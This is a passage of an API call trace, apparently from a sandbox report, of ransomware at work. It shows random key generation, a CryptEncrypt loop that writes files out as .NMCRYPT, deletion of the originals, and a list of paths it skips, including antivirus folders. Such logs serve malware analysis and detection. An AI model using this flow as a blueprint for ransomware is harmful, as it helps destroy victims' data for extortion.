out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.607] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.608] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.608] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.609] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0147.609] CryptHashData (hHash=0x9ad378, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.609] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad478) returned 1 [0147.609] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.609] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.609] wcslen (_String="\\\\?\\") returned 0x4 [0147.609] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad838) returned 1 [0147.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.609] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2526) returned 1 [0147.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.610] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.611] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.611] GetLastError () returned 0x0 [0147.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.612] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.612] GetLastError () returned 0x0 [0147.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.612] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.612] GetLastError () returned 0x0 [0147.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.612] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.612] GetLastError () returned 0x0 [0147.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.612] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.612] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.612] GetLastError () returned 0x0 [0147.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.612] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.613] GetLastError () returned 0x0 [0147.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.613] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.613] GetLastError () returned 0x0 [0147.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.613] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.613] GetLastError () returned 0x0 [0147.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.613] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.613] GetLastError () returned 0x0 [0147.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.613] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xde, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xde, lpOverlapped=0x0) returned 1 [0147.613] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xde, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0147.613] GetLastError () returned 0x0 [0147.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0147.613] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.613] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0x20 [0147.613] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml", dwFileAttributes=0x20) returned 0 [0147.614] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 1 [0147.614] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0 [0147.614] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" [0147.614] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.614] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB380.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb380.tmp")) returned 0xb380 [0147.615] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB380.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb380.tmp"), dwFlags=0x1) returned 0 [0147.615] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB380.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb380.tmp")) returned 1 [0147.615] CryptDestroyKey (hKey=0x9ad838) returned 1 [0147.615] wcslen (_String="OK") returned 0x2 [0147.615] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.615] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.615] CryptDestroyKey (hKey=0x9ad478) returned 1 [0147.615] CryptDestroyHash (hHash=0x9ad378) returned 1 [0147.615] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0147.615] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*NMCRYPT") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*Recovers your files.html") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.exe") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.dll") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.lnk") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.bat") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.ini") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.msi") returned 0 [0147.615] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*.scf") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*pagefile.sys*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*AppData*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\winrar\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\java\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\windows\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\ESET\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\AVG\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*Atheros*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*Realtek*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*bootmgr*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*boot*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*boot*") returned 0 [0147.616] PathMatchSpecW 